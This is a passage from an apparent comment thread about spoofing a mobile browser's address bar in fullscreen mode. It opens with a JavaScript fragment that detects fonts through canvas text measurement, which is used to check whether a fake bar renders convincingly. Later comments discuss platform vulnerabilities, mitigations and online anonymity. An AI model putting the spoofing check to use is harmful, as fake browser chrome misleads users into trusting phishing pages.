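  ctx.font = "16px monospace";
  const fallback = ctx.measureText(sample).width;
  ctx.font = "16px Roboto, monospace"; // Roboto: assumed Chrome UI font
  const candidate = ctx.measureText(sample).width;
  // Under Safari's mitigation the nonstandard font is refused, the two
  // widths match, and the spoofed bar renders in the wrong typeface.
  console.log(fontDiffers(candidate, fallback));
}
```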
Security vulnerabilities are discovered on all platforms. Just recently an eavesdropping vulnerability was found in iOS[0] that certainly qualifies as far more severe. Given that security issues can pop up on any platform, I don't think calling one group of users "poor" is prudent, or a nice thing to do.
I guess this risk could be mitigated if the browser ran recognition code in the background to detect when the top of the page was mimicking the search bar. I'm not fond of the idea of putting restrictions on fullscreen mode, where it requires user approval on scrolling down or something of that sort.
Reading these comments initially made me sad. So many echoes of the article’s theme - ‘look at this flaw and how I exploited it’. At first I thought the author had cast a magical spell to bring out the dark side in us. But really, the adversarial initiative in us already exists and is simply suppressed. We go about all day acting ‘civilized’ while the animal in us paces nervously, waiting for an opportunity to get out. And in the anonymity of the net, we let the animal out. How many of us would brag about these accomplishments to our children, or to our boss at work?
But then I realized how honest every post was. How anonymity also encouraged ‘free’ speech. And remarkably how much data was shared. Before the net, when we couldn’t be anonymous, we couched our meanings in bs and obfuscation. The ‘bs’ meter was a finely tuned process that you had to develop and run in the background to sort the chaff from a person’s words. Now, comments are often accompanied by a github link where I can read and test the code that people brag about. Thank you internet